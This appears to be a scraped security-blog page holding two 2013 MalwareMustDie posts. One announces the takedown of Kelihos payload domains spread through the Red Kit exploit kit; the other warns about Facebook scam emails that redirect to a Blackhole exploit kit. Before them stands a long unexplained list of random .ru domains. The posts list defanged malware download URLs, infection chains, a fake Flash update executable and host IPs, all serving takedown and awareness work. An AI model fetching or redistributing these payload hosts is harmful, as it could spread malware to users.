dyjvewshptsboygd.ru
plmekaayiholtevt.ru
cyosongjihugkjbg.ru
nkrbvqxzfwicmhwb.ru
axtopsbtntqnfdyk.ru
mkwwclogcvgeekws.ru
yvxfekhokspfuwqr.ru
ljbvfrsvcevyfhor.ru
xvcewyydwsmdgaju.ru
jjgshrjdcynohyuk.ru
vuhaojpwxgsxuitu.ru
iiloishkjwvqldlq.ru
uumwyzhctrwdsrdp.ru
hiplksflttfkpsxn.ru
ttqtkmthptxvwiku.ru
fhuidtlqttqxgjvn.ru
rtvqcdpbqxgwnrcn.ru
ehyewyqydfpidbdp.ru
qsbourrdxgxgwepy.ru
dhedppigtpbwrmpc.ru
osflhkaowydftniw.ru
bgjzhlasdrwwnenj.ru
nrkhysgoltauclop.ru
zenquqdskekaudbe.ru
mroeqjdaukskbgua.ru
ydrngsmrdiiyvoiy.ru
krtbityuhlewigfe.ru
jwkpdxqbemsmclal.ru
uinyjmxfqinkxbda.ru
hvpmffxpfnlquqxo.ru
tisubmfvqrgnloxr.ru
gvujhzvjxwptrtdg.ru
shxrsvasoncjnxpn.ru
fuyfrockpfclxccd.ru
qhcplcuugevvyham.ru
dueebwwdllfburag.ru
pghnrmkoeoetfwsm.ru
ctjbmgjudwisgshv.ru
ogmjjmqdhlbyabzg.ru
atnwerhvttvbivra.ru
mfqfrnqllqcrayiw.ru
yrrnrgliojezjctg.ru
lfvcngdbzjrzgyby.ru
xqwkdyjydkggsppd.ru
keabgwmpzqhpmlng.ru
vqcicnuhtwhxmtjd.ru
iefwvulgninlkoxe.ru
upgghggmbusopaxv.ru
hektxucstnbuncix.ru
tplczomvebjmhsgk.ru
gdoqznfilmtulxxv.ru
ropypfmcqjjfdiel.ru
edtmjcvfnfcbweed.ru
qouubrmdxtgnnjvm.ru
dcyjurmfwhgvyoio.ru
pozrtgdmhvhvdscn.ru
ccdifvomwhtynpay.ru
nneplwlvlcojiegm.ru
lsvdxjpwykxxvryd.ru
xfymtpavzblzbknq.ru
ksacasnubklrikdl.ru
wedkgpdcxlrunbmu.ru
jrfyaswntteouafv.ru
veihxoqukuetxqbn.ru
hrkusbnevtmyisab.ru
tdndpphrtyniynvz.ru
gqortbbbsnksxpmm.ru
sdrzgpowhyckaogu.ru
fqtooihtbhwdxskt.ru
rcwwrqssqrrfpgvd.ru
dpxkgybdgttbeyfh.ru
pcbukgjlihpvehyu.ru
cpdjalvpsvfgqtbd.ru
obgrcxuqunmquthx.ru
bpifbqdpzavdjljq.ru
nbloiroucuvotnck.ru
ymmwxgaimxgqtrdv.ru
lapkpatjbkubfxeu.ru
xmqspbcjfttkibbg.ru
kauhrjmdqenmtyvk.ru
wlvpilfxnxpdoujt.ru
jzxdofqtnlusever.ru
ulbnairmbptfscka.ru
hyccqffkdslpbuue.ru
tkfksqvkqdhspdsm.ru
gyhxgveinbdufdnt.ru
skkhxjykeyukyebl.ru
exmubcrfgpaijgzx.ru
opgsgmrejtyazcrf.ru
bdjhtgqhggicwrmy.ru
nolpsdqvivphcoew.ru
zboxoswkbebgarsh.ru
moplknnccyfkesaj.ru
yasuaexybixmvnge.ru
knuidyekzkyuhtpi.ru
wzvqmhzpppziurdl.ru
jnyfopdfycjyfomx.ru
vybofxkqmidtcnhq.ru
imedqfzemirxjqhn.ru
tyflwmgobjignmbd.ru
gmjzqviddrqumknm.ru
sxkiifqgzmsjvxzn.ru
fmnvbcuebuoyhxgq.ru
rxoebpmmwjgsphyp.ru
elsskgujckxkdqry.ru
pwtbsyitleslzngt.ru
clxpvwfqexkciciu.ru
owyxdqwgvlyndmwr.ru
bkcnxdtvxcjpyobq.ru
nwdvufzkpszkvxxk.ru
zigfmudoxbqehljf.ru
lvishxhsbgoyclva.ru
xhlbffbmicnnxpsk.ru
kvnoygvsciiyrnlp.ru
whqxutzyuwvaijbq.ru
jurlbjnqmycnjoat.ru
vhutmessbhrhonso.ru
huwiddttqzujegjk.ru
tgzqyfhfekefmnuv.ru
rlqglzqqhehmtryd.ru
eystwwslgmwxzqsu.ru
qlvcdbyuturxcusx.ru
dywqzqyouieuojub.ru
pkabphfegwhtnoug.ru
bycojtqkhamhawoj.ru
nkfxfqvofqbuhuuz.ru
axhlltpcxcixsdhv.ru
mjktxpzccvifevpc.ru
yvlcjbweeheoixyj.ru
ljoqjstmgdotqyll.ru
wupyyjwqhozwdpcb.ru
jitnlsxlmbtdzmwf.ru
vuuurusnjxorennj.ru
iiyjdtxigdyuyzcz.ru
utzrdmsexiffrltv.ru
hidifzbettjuadfh.ru
steqvhuhrqsmynoh.ru
fhifzexvhegcjtdx.ru
rsjmnrjedkuvhwfs.ru
ehmbrpusljbmykrn.ru
qsojzcltslhstxnj.ru
dgrxbomayxjhdike.ru
ossgrsfecodjxjhy.ru
bgwutpbwpbcrzthd.ru
nrxcdfhydmlcnoay.ru
zdbnzonswqhjphqh.ru
mrcblkrgikgxxtwc.ru
xdfjryydcfwvkvui.ru
kqhxgmvevducviey.ru

#MalwareMustDie!

Search

Suspension announcement of 97 .RU domains (registered in REGGI.RU) used by Kelihos Crime Group to spread payload via Red Kit Exploit Pack

July 24, 2013, 12:44 pm
$
0
0
MalwareMustDie, NPO, during its research activities, is following the process of suspension malware bad domains as important milestones in malware fighting steps. is also publicly releasing some of suspension domains in the "Operation Tango Down" [What is TangoDown?] as a public announcement.

This time we are shutting down the Kelihos Trojan payload download server's used 97 .RU domains, which was distrubuted by the Red Kit Exploit Kit. All of the detected payload URL we registered them into URLQuery and summarize the URL used for infection by automation after all of the data finished to be registered. We thank you URLQuery for providing a good service that is helpful as evidence of crime for the further legal process. In this case we detected 150 URLs infection, under 97 .RU domains, some of the URLs are served under a subdomains. The usage of the DGA-like randomisation for the domain used for the payload is the MO of this distribution.

The Kelihos Trojan were distributed in (mainly) East European (Ukrainian, Latvia, Belarus, Russia) and Asia servers (Japan, Korea, Taiwan and Hongkong) as the secondary layers, with also using the scattered world wide hacked machines.

Verdict of Crime

The current report is a systematic process of a successful suspension process, as a good coordination between MalwareMustDie members and supporters who help spotted, analysed & reported the threat, our PiCs in Tango Team (thank's to ‏@DL for the hard work during holiday time) and the GroupIB who was performing an excellent coordination on dismantling the related domains to the related Russia registrar (REGGI.RU) suspension process. Overall time took 4d+ for the communication and confirmation process taken.

This wave of Red Kit Exploit Kit campaign using Kelihos as payload was spotted infecting world wide, with the help from our Japan team we have a strong evidence of this infection effort as per published in Operation Clean-up Japan (OCJP) in case #113 here-->>[OCJP-013] , on five domestic sites.

Those infection payload is as per below real sample captured below:

RedKit Redirection PoC Snapshot:
[1][2][3][4][5]

Based on the payloads above we seek and collected all of the payload servers for this shutdown purpose.

Tango Information

The payload URL is as per below long list, which will be followed by another long list of 97 dismantled domains:

Infection URL data: 

// #MalwareMustDie! Kelihos payload URL via RedKit EK Infection
// Reference: http://unixfreaxjp.blogspot.jp/2013/07/ocjp-113redkit-exploit-kitkelihosvia.html
// Detection range: July 1st, 2013 - July 16, 2013
// 

// grep rasta*

0 / 3 [7]hxxp://131.155.81.158/rasta01.exe Netherlands 131.155.81.158
0 / 6 [8]hxxp://fuhxodyz.ru/rasta01.exe Belarus 93.125.67.95
0 / 0 [9]hxxp://www.philchor-nb.de/demo/rasta01.exe Germany
0 / 2 [10]hxxp://ikqydkod.ru/rasta01.exe Ukraine 109.251.141.23
0 / 2 [11]hxxp://aro0eq.hozfezbe.ru/rasta01.exe Russian Federation
0 / 6 [12]hxxp://bopefidi.ru/rasta01.exe Russian Federation 2.94.27.238
0 / 2 [13]hxxp://ycsycxyd.ru/rasta01.exe Ukraine 46.119.193.89
0 / 2 [14]hxxp://sojouvyc.ru/rasta01.exe Ukraine 31.128.74.7
0 / 2 [15]hxxp://vadlubiq.ru/rasta01.exe Ukraine 109.162.84.6
0 / 2 [16]hxxp://kazlyjva.ru/rasta01.exe Malaysia 58.26.182.98
0 / 2 [17]hxxp://funfubap.ru/rasta01.exe Taiwan 114.35.239.185
0 / 2 [18]hxxp://goryzcob.ru/rasta01.exe Ukraine 109.87.254.247
0 / 2 [19]hxxp://motbajsi.ru/rasta01.exe Ukraine 91.196.61.56
0 / 6 [20]hxxp://xymkapaq.ru/rasta01.exe Latvia 89.201.53.86
0 / 2 [21]hxxp://hupjiwuc.ru/rasta01.exe Ukraine 195.114.156.254
0 / 6 [22]hxxp://runevfoh.ru/rasta01.exe Ukraine 5.248.34.57
0 / 2 [23]hxxp://virerceb.ru/rasta01.exe Argentina 190.227.181.203
0 / 6 [24]hxxp://xatzyjha.ru/rasta01.exe Taiwan 1.172.233.239
0 / 2 [25]hxxp://makgivus.ru/rasta01.exe Canada 99.250.218.131
0 / 2 [26]hxxp://avryjpet.ru/rasta01.exe Belarus 91.215.178.83
0 / 2 [27]hxxp://kyjaqcoz.ru/rasta01.exe Ukraine 213.231.52.44
0 / 2 [28]hxxp://bopefidi.ru/rasta01.exe Taiwan 111.255.72.1
0 / 6 [29]hxxp://ycsycxyd.ru/rasta01.exe Japan 118.104.77.165
0 / 2 [30]hxxp://gazgowry.ru/rasta01.exe Ukraine 77.122.55.112
0 / 2 [31]hxxp://vetarwep.ru/rasta01.exe Kazakhstan 176.222.169.243
0 / 6 [32]hxxp://aro0eq.hozfezbe.ru/rasta01.exe Bulgaria 95.43.87.30
0 / 6 [33]hxxp://gulaxxax.ru/rasta01.exe Ukraine 31.42.69.61
0 / 6 [34]hxxp://onhugxic.ru/rasta01.exe Kazakhstan 109.239.45.48
0 / 2 [35]hxxp://ahfamzyk.ru/rasta01.exe Ukraine 178.150.33.194
0 / 6 [36]hxxp://sykevked.ru/rasta01.exe Ukraine 151.0.44.52
0 / 6 [37]hxxp://ydhicdor.ru/rasta01.exe Ukraine 78.30.249.126
0 / 1 [38]hxxp://qeisybyg.ru/rasta01.exe Ukraine 109.87.7.53
0 / 2 [39]hxxp://ycsycxyd.ru/rasta01.exe Ukraine 188.231.173.99
0 / 6 [40]hxxp://kifectah.ru/rasta01.exe Japan 61.27.109.166
0 / 2 [41]hxxp://busasxyv.ru/rasta01.exe Belarus 37.215.87.61
0 / 6 [42]hxxp://yjnaqwew.ru/rasta01.exe Ukraine 93.77.96.252
0 / 6 [43]hxxp://xuktalez.ru/rasta01.exe Ukraine 176.106.211.135
0 / 2 [44]hxxp://ybtoptag.ru/rasta01.exe Latvia 89.191.110.59
0 / 2 [45]hxxp://lygyucce.ru/rasta01.exe Ukraine 94.178.78.102
0 / 6 [46]hxxp://taykenid.ru/rasta01.exe Ukraine 212.92.227.111
0 / 2 [47]hxxp://qeisybyg.ru/rasta01.exe Ukraine 109.251.2.33
0 / 6 [48]hxxp://taykenid.ru/rasta01.exe Ukraine 176.8.183.90
0 / 2 [49]hxxp://qeisybyg.ru/rasta01.exe Ukraine 77.87.156.180
0 / 2 [50]hxxp://bysjyhuf.ru/rasta01.exe Taiwan 1.173.164.63
0 / 6 [51]hxxp://najniner.ru/rasta01.exe Taiwan 114.40.130.52
0 / 4 [52]hxxp://193.105.134.189/rasta01.exe Sweden 193.105.134.189
0 / 6 [53]hxxp://dakacdyn.ru/rasta01.exe Ukraine 178.158.82.158
0 / 6 [54]hxxp://higrikpy.ru/rasta01.exe Belgium 85.26.38.155
0 / 2 [55]hxxp://dipteqna.ru/rasta01.exe Ukraine 109.87.32.180
0 / 6 [56]hxxp://kykywpik.ru/rasta01.exe Ukraine 5.1.13.86
0 / 2 [57]hxxp://cimmitic.ru/rasta01.exe Japan 118.237.85.238
0 / 2 [58]hxxp://ybtoptag.ru/rasta01.exe Belarus 91.215.178.235
0 / 6 [59]hxxp://suyzerew.ru/rasta01.exe Kazakhstan 178.91.37.180
0 / 6 [60]hxxp://ycsycxyd.ru/rasta01.exe Ukraine 93.77.68.69
0 / 2 [61]hxxp://ynhazcel.ru/rasta01.exe Kazakhstan 2.133.226.218
0 / 6 [62]hxxp://aflyzkac.ru/rasta01.exe Ukraine 93.77.28.43
0 / 2 [63]hxxp://giktyxvu.ru/rasta01.exe Ukraine 188.190.42.32
0 / 4 [64]hxxp://193.105.134.89/rasta01.exe Sweden 193.105.134.89
0 / 2 [65]hxxp://aro0eq.hozfezbe.ru/rasta01.exe Ukraine 31.133.38.207
0 / 2 [66]hxxp://aflyzkac.ru/rasta01.exe Japan 210.148.165.67
0 / 6 [67]hxxp://giktyxvu.ru/rasta01.exe Ukraine 178.159.231.99
0 / 6 [68]hxxp://ybtoptag.ru/rasta01.exe Ukraine 89.252.33.161
0 / 6 [69]hxxp://dyvgigim.ru/rasta01.exe Ukraine 37.229.35.234
0 / 4 [70]hxxp://193.105.134.89/rasta01.exe Sweden 193.105.134.89
0 / 6 [71]hxxp://jehrecyp.ru/rasta01.exe Ukraine 188.230.9.64
0 / 2 [72]hxxp://aro0eq.hozfezbe.ru/rasta01.exe[/code] Ukraine
0 / 6 [73]hxxp://cyrkapov.ru/rasta01.exe Ukraine 176.8.183.90
0 / 6 [74]hxxp://niqtasoz.ru/rasta01.exe Ukraine 46.172.147.122
0 / 2 [75]hxxp://ginkyvub.ru/rasta01.exe Ukraine 93.77.84.22
0 / 2 [76]hxxp://tejjetzo.ru/rasta01.exe Moldova, Republic of
0 / 6 [77]hxxp://fafehwiz.ru/rasta01.exe Ukraine 178.150.115.215
0 / 2 [78]hxxp://yhzelbyp.ru/rasta01.exe Ukraine 37.57.24.238
0 / 2 [79]hxxp://ihurvyun.ru/rasta01.exe Ukraine 178.158.198.249
0 / 6 [80]hxxp://adtyuhuz.ru/rasta01.exe Russian Federation 128.73.7.18
0 / 2 [81]hxxp://aro0eq.hozfezbe.ru/rasta01.exe Hong Kong 118.141.33.46
0 / 6 [82]hxxp://jehrecyp.ru/rasta01.exe Ukraine 91.200.138.241
0 / 7 [83]hxxp://tejjetzo.ru/rasta01.exe Ukraine 94.153.63.166
0 / 3 [84]hxxp://fafehwiz.ru/rasta01.exe Ukraine 81.163.152.32
0 / 3 [85]hxxp://yhzelbyp.ru/rasta01.exe Chile 186.36.204.152
0 / 7 [86]hxxp://adtyuhuz.ru/rasta01.exe Argentina 190.107.122.36
0 / 7 [87]hxxp://aggaxsef.ru/rasta01.exe Taiwan 1.173.221.95
0 / 3 [88]hxxp://bomuxvis.ru/rasta01.exe Taiwan 1.172.231.167
0 / 7 [89]hxxp://jehrecyp.ru/rasta01.exe Ukraine 178.150.57.167
0 / 7 [90]hxxp://xejabfom.ru/rasta01.exe Belarus 176.118.159.88
0 / 3 [91]hxxp://sapigrys.ru/rasta01.exe Ukraine 93.77.97.98
0 / 3 [92]hxxp://sodkanxo.ru/rasta01.exe Ukraine 77.122.55.156
0 / 7 [93]hxxp://aggaxsef.ru/rasta01.exe Ukraine 178.150.169.180
0 / 3 [94]hxxp://fafehwiz.ru/rasta01.exe Ukraine 89.162.163.66
0 / 3 [95]hxxp://zyvjofat.ru/rasta01.exe Taiwan 36.239.213.101
0 / 2 [96]hxxp://paxgeqjo.ru/rasta01.exe Israel 46.121.221.173
0 / 6 [97]hxxp://zyvjofat.ru/rasta01.exe Ukraine 46.211.95.246
0 / 2 [98]hxxp://hiznizoc.ru/rasta01.exe Korea, Republic of
0 / 2 [99]hxxp://lysopzoh.ru/rasta01.exe Ukraine 46.118.218.45
0 / 2 [100]hxxp://zyvjofat.ru/rasta01.exe Ukraine 178.150.192.214
0 / 2 [101]hxxp://xoqhozaz.ru/rasta01.exe Ukraine 109.162.96.64
0 / 2 [102]hxxp://hiznizoc.ru/rasta01.exe Ukraine 176.112.20.187
0 / 6 [103]hxxp://lysopzoh.ru/rasta01.exe Ukraine 93.175.234.62
0 / 6 [104]hxxp://zyvjofat.ru/rasta01.exe Ukraine 46.211.227.0
0 / 6 [105]hxxp://pywudcoz.ru/rasta01.exe Japan 180.14.61.59
0 / 6 [106]hxxp://izytexuf.ru/rasta01.exe Taiwan 123.194.247.85
0 / 6 [107]hxxp://izytexuf.ru/rasta01.exe Kazakhstan 2.132.145.189
0 / 6 [108]hxxp://usfezhyk.ru/rasta01.exe Ukraine 176.98.15.73
0 / 6 [109]hxxp://hipahsah.ru/rasta01.exe Belarus 134.17.112.99
0 / 6 [110]hxxp://talozzum.ru/rasta01.exe Ukraine 93.78.126.109
0 / 6 [111]hxxp://yrupxyen.ru/rasta01.exe Ukraine 5.105.21.178
0 / 6 [112]hxxp://nacwoman.ru/rasta01.exe Ukraine 109.251.74.37
0 / 2 [113]hxxp://libcikak.ru/rasta01.exe Japan 219.102.110.98
0 / 6 [114]hxxp://uphinjaq.ru/rasta01.exe Ukraine 151.0.5.20
0 / 6 [115]hxxp://aziwolge.ru/rasta01.exe Ukraine 151.0.38.74
0 / 6 [116]hxxp://kosnutef.ru/rasta01.exe Ukraine 93.79.38.73
0 / 6 [117]hxxp://kiyvryhy.ru/rasta01.exe Ukraine 80.77.44.150
0 / 2 [118]hxxp://oktizsez.ru/rasta01.exe Ukraine 91.227.207.89
0 / 6 [119]hxxp://uphinjaq.ru/rasta01.exe Ukraine 31.170.137.75
0 / 6 [120]hxxp://xaplovav.ru/rasta01.exe Ukraine 93.79.113.101
0 / 6 [121]hxxp://aziwolge.ru/rasta01.exe Ukraine 93.79.2.115
0 / 6 [122]hxxp://uphinjaq.ru/rasta01.exe Taiwan 114.25.156.106
0 / 6 [123]hxxp://xaplovav.ru/rasta01.exe Japan 123.225.106.205
0 / 6 [124]hxxp://oktizsez.ru/rasta01.exe Taiwan 111.252.191.134
0 / 6 [125]hxxp://kiyvryhy.ru/rasta01.exe Taiwan 124.11.195.73
0 / 2 [126]hxxp://sisvizub.ru/rasta01.exe Belarus 178.124.179.118
0 / 2 [127]hxxp://lymimnib.ru/rasta01.exe Ukraine 37.229.38.92
0 / 6 [128]hxxp://fugegwyf.ru/rasta01.exe Ukraine 159.224.94.242
0 / 2 [129]hxxp://fugegwyf.ru/rasta01.exe Russian Federation
0 / 2 [130]hxxp://urxibzep.ru/rasta01.exe Latvia 79.135.142.166
0 / 6 [131]hxxp://cibowjuv.ru/rasta01.exe Japan 219.173.80.25
0 / 6 [132]hxxp://pedtokid.ru/rasta01.exe Ukraine 188.231.173.99
0 / 2 [133]hxxp://bawoxgud.ru/rasta01.exe Ukraine 188.231.173.99

// grep userid*

0 / 3 [7]hxxp://131.155.81.158/userid2.exe Netherlands 131.155.81.158
0 / 6 [8]hxxp://fuhxodyz.ru/userid2.exe Ukraine 89.252.33.161
0 / 2 [9]hxxp://ikqydkod.ru/userid2.exe Ukraine 178.137.38.18
0 / 1 [10]hxxp://ikqydkod.ru/ruserid2.exe Ukraine 176.8.183.137
0 / 6 [11]hxxp://xudsahbu.ru/userid2.exe Colombia 186.99.248.89
0 / 6 [12]hxxp://dypqysro.ru/userid2.exe Ukraine 212.79.121.221
0 / 6 [13]hxxp://uhipyvob.ru/userid2.exe Ukraine 46.119.193.89
0 / 2 [14]hxxp://jyuhysdo.ru/userid2.exe Ukraine 46.119.129.244
0 / 6 [15]hxxp://runevfoh.ru/userid2.exe Ukraine 46.211.249.42
0 / 6 [16]hxxp://hupjiwuc.ru/userid2.exe Ukraine 78.30.193.176
0 / 7 [17]hxxp://busasxyv.ru/userid2.exe Russian Federation 2.94.27.238
0 / 6 [18]hxxp://cypseguv.ru/userid2.exe Taiwan 124.12.91.243
0 / 3 [19]hxxp://78.83.177.242/userid2.exe Bulgaria 78.83.177.242
0 / 7 [20]hxxp://runevfoh.ru/userid2.exe Japan 123.176.141.183
0 / 6 [21]hxxp://confikja.ru/userid2.exe Ukraine 212.2.153.131
0 / 6 [22]hxxp://runevfoh.ru/userid2.exe Belarus 93.191.99.97
0 / 6 [23]hxxp://confikja.ru/userid2.exe Belarus 37.215.114.92
0 / 2 [24]hxxp://confikja.ru/userid2.exe Ukraine 109.87.181.75
0 / 6 [25]hxxp://tofhermi.ru/userid2.exe Ukraine 109.87.83.108
0 / 1 [26]hxxp://fafehwiz.ru/userid1.exe Ukraine 178.151.63.5
0 / 6 [27]hxxp://ybtoptag.ru/userid2.exe Ukraine 94.153.63.166
0 / 2 [28]hxxp://qeisybyg.ru/userid2.exe Russian Federation
0 / 2 [29]hxxp://mihumcuf.ru/userid2.exe Ukraine 77.122.68.176
0 / 1 [30]hxxp://fafehwiz.ru/userid1.exe Ukraine 94.154.33.114
0 / 1 [31]hxxp://ollopdub.ru/userid1.exe Taiwan 114.27.25.145
0 / 1 [32]hxxp://fafehwiz.ru/userid1.exe Ukraine 159.224.8.181
0 / 1 [33]hxxp://ollopdub.ru/userid1.exe Ukraine 92.52.177.41
0 / 1 [34]hxxp://fafehwiz.ru/userid1.exe Ukraine 94.45.106.206
0 / 1 [35]hxxp://ollopdub.ru/userid1.exe Ukraine 109.162.41.226
0 / 1 [36]hxxp://fafehwiz.ru/userid1.exe India 49.206.161.32
0 / 1 [37]hxxp://pywudcoz.ru/userid1.exe Ukraine 93.78.79.28
0 / 1 [38]hxxp://ollopdub.ru/userid1.exe Hong Kong 223.19.195.162
0 / 1 [39]hxxp://ollopdub.ru/userid1.exe Ukraine 46.185.34.216
0 / 1 [40]hxxp://pywudcoz.ru/userid1.exe Russian Federation
0 / 1 [41]hxxp://hiznizoc.ru/userid1.exe Ukraine 87.244.169.104
0 / 1 [42]hxxp://ollopdub.ru/userid1.exe Macedonia 146.255.91.19
0 / 1 [43]hxxp://hiznizoc.ru/userid1.exe Ukraine 176.36.152.60
0 / 1 [44]hxxp://ollopdub.ru/userid1.exe Ukraine 37.143.93.132
0 / 1 [45]hxxp://kosnutef.ru/userid1.exe Ukraine 176.111.35.196
0 / 6 [46]hxxp://acaqizwy.ru/userid1.exe Taiwan 61.227.163.213
0 / 2 [47]hxxp://lymimnib.ru/userid1.exe Ukraine 176.103.208.105
0 / 2 [48]hxxp://sisvizub.ru/userid1.exe Ukraine 178.150.212.143
0 / 3 [49]hxxp://78.83.177.242/userid1.exe Bulgaria 78.83.177.242
0 / 3 [50]hxxp://78.83.177.242/userid1.exe Bulgaria 78.83.177.242
0 / 3 [51]hxxp://78.83.177.242/userid1.exe Bulgaria 78.83.177.242
0 / 2 [52]hxxp://ankoweco.ru/userid1.exe Poland 79.135.180.94
0 / 2 [53]hxxp://uxmadjox.ru/userid1.exe Poland 86.63.98.141

---
#MalwareMustDie! $ date
Tue Jul 16 22:14:11 JST 2013
The domain list and UP IP's as per Fri Jul 19 20:01:00 JST 2013 status during the shutdown process 
uhipyvob.ru,178.150.17.118,
ollopdub.ru,176.8.3.144,
fafehwiz.ru,91.217.58.74,
fuhxodyz.ru,77.122.197.86,
ikqydkod.ru,37.229.144.253,
bopefidi.ru,118.34.132.154,
ycsycxyd.ru,95.140.214.250,
sojouvyc.ru,188.129.218.87,
vadlubiq.ru,178.93.135.94,
kazlyjva.ru,109.162.94.114,
funfubap.ru,213.37.166.193,
goryzcob.ru,213.37.166.193,
motbajsi.ru,178.158.158.182,
xymkapaq.ru,93.185.219.213,
runevfoh.ru,89.215.115.4,
virerceb.ru,94.153.36.164,
xatzyjha.ru,93.79.152.211,
makgivus.ru,79.135.211.87,
avryjpet.ru,178.211.105.168,
kyjaqcoz.ru,46.119.144.106,
hiznizoc.ru,46.250.7.179,
giktyxvu.ru,77.123.79.211,
ynhazcel.ru,178.172.246.30,
gazgowry.ru,93.89.208.202,
vetarwep.ru,5.248.164.41,
gulaxxax.ru,46.119.144.106,
onhugxic.ru,109.251.126.26,
ahfamzyk.ru,46.49.47.254,
sykevked.ru,93.77.96.252,
ydhicdor.ru,94.137.172.44,
kifectah.ru,109.122.40.111,
busasxyv.ru,77.121.199.73,
yjnaqwew.ru,77.121.255.183,
xuktalez.ru,91.123.150.115,
lygyucce.ru,94.158.74.230,
taykenid.ru,109.108.252.136,
bysjyhuf.ru,5.1.22.63,
najniner.ru,126.65.174.136,
dakacdyn.ru,109.254.67.25,
higrikpy.ru,78.154.168.74,
dipteqna.ru,188.190.75.232,
kykywpik.ru,109.122.33.79,
cimmitic.ru,153.180.71.144,
suyzerew.ru,217.196.171.35,
yhzelbyp.ru,77.123.80.174,
aflyzkac.ru,93.185.220.213,
tejjetzo.ru,93.89.208.202,
lysopzoh.ru,178.168.22.114,
dyvgigim.ru,46.211.75.123,
jehrecyp.ru,87.69.55.36,
cyrkapov.ru,190.220.70.79,
niqtasoz.ru,178.150.17.118,
ginkyvub.ru,77.123.80.174,
zyvjofat.ru,93.79.152.211,
ihurvyun.ru,94.231.190.74,
izytexuf.ru,31.192.237.101,
adtyuhuz.ru,84.252.56.59,
aggaxsef.ru,94.230.201.36,
bomuxvis.ru,84.240.19.130,
xejabfom.ru,178.158.186.24,
sapigrys.ru,95.69.187.249,
sodkanxo.ru,117.197.245.69,
paxgeqjo.ru,49.205.210.193,
xoqhozaz.ru,95.160.83.57,
usfezhyk.ru,46.119.212.183,
hipahsah.ru,109.87.200.213,
talozzum.ru,31.133.52.8,
yrupxyen.ru,91.224.168.65,
nacwoman.ru,178.150.90.223,
libcikak.ru,46.119.128.115,
uphinjaq.ru,109.162.9.212,
aziwolge.ru,178.150.17.118,
oktizsez.ru,78.139.153.169,
kiyvryhy.ru,79.133.254.238,
fugegwyf.ru,188.190.75.232,
urxibzep.ru,91.225.173.12,
cibowjuv.ru,, // down
pedtokid.ru,, // down
bawoxgud.ru,31.133.55.240,
xudsahbu.ru,195.24.155.245,
dypqysro.ru,31.170.137.75,
jyuhysdo.ru,78.154.168.74,
hupjiwuc.ru,188.121.198.247,
cypseguv.ru,176.8.249.131,
confikja.ru,93.171.77.37,
tofhermi.ru,36.224.71.20,
ybtoptag.ru,180.61.12.116,
qeisybyg.ru,77.122.124.210,
mihumcuf.ru,93.185.220.213,
pywudcoz.ru,89.201.116.227,
kosnutef.ru,79.164.250.218,
acaqizwy.ru,178.150.244.54,
lymimnib.ru,117.197.15.103,
sisvizub.ru,89.28.52.30,
ankoweco.ru,, // down
uxmadjox.ru,, // down
hozfezbe.ru,178.210.222.205,

Again, we thank you to all friends, entities and support for your great cooperation and advise. Analysis and spotting a threat is one thing, but the hardest part is to make the threat goes down, better yet to put the crime responsible individuals to pay what they deserved.

MalwareMustDie will continue every effort to dismantle malware from internet and providing every crime evidence found to the related authority. Your help and support on every investigationwill be very appreciated.

Public announcement by #MalwareMustDie, NPO., 2013. All rights reserved.
Anti CyberCrime Research Group - malwaremustdie.org

#Alert! #Facebook scam emails that will lead you to #Blackhole EK (162.216.18.169, GoDaddy/Linode)

July 25, 2013, 5:31 am
$
0
0
Note: I wrote this post as a quick note to raise tis threat's awareness, a warning for users and also to be used as verdict for shutdown purpose, so I am sorry if you did not find any deep analysis this time.

We received tons of Facebook email scams with the three themes: Asking you about Facebook password changes, "Your photo was tagged" notification and Friends request notification. I made snapshot of these threes as per below (please click to enlarge the pics):

These emails will trick you to click the below malware infection URLs: 

h00p://198.251.67.11/sonya/index.html
h00p://www.kauai2u.com/hiding/index.html
h00p://nendt.com/horded/index.html
h00p://whittakerwatertech.com/hewed/index.html
h00p://www.readingfluency.net/demising/index.html
h00p://adeseye.me.pn/saluted/index.html
h00p://www.bst-kanzlei.de/gist/index.html
h00p://www.discountprescriptions.pacificsocial.com/signally/index.html

What happen after you accessed those URL is, you will load the malicious JavaScript in the below URL: 

h00p://traditionlagoonresort.com/prodded/televised.js
And you will be redirected to the Blackhole exploit Kit site here: 
h00p://nphscards.com/topic/accidentally-results-stay.php
The browser will look like this upon redirection...

The Blackhole host itself is up and alive in the below domain and NS: 

nphscards.com  A  162.216.18.169
nphscards.com  NS  ns30.domaincontrol.com
nphscards.com  NS  ns29.domaincontrol.com
You will see a long record of infection of this IP as per spotted in URLQuery here-->>[CLICK], with the pasted below: 
2013-07-25 12:25:54 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-25 09:30:28 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-25 08:33:34 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-25 02:38:35 h00p://nphssoccercards.com [United States] 162.216.18.169
2013-07-25 01:07:51 h00p://nphssoccercards.com/favicon.ico [United States] 162.216.18.169
2013-07-25 01:05:34 h00p://nphssoccercards.com/ubi/template/identity/lib/style-nurse.htc [United States] 162.216.18.169
2013-07-25 01:03:43 h00p://nphssoccercards.com/adobe/update_flash_player.exe [United States] 162.216.18.169
2013-07-25 00:15:33 h00p://nphssoccercards.com/adobe/update_flash_player.exe [United States] 162.216.18.169
2013-07-25 00:12:25 h00p://2013vistakonpresidentsclub.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-25 00:11:30 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-25 00:04:06 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-24 23:43:58 h00p://2013vistakonpresidentsclub.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-24 22:49:27 h00p://2013vistakonpresidentsclub.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-24 22:14:26 h00p://nphssoccercards.com/adobe/update_flash_player.exe [United States] 162.216.18.169
2013-07-24 22:02:13 h00p://2013vistakonpresidentsclub.com/ [United States] 162.216.18.169
2013-07-24 21:50:46 h00p://2013vistakonpresidentsclub.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-24 21:47:23 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-24 20:03:35 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-24 19:40:30 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
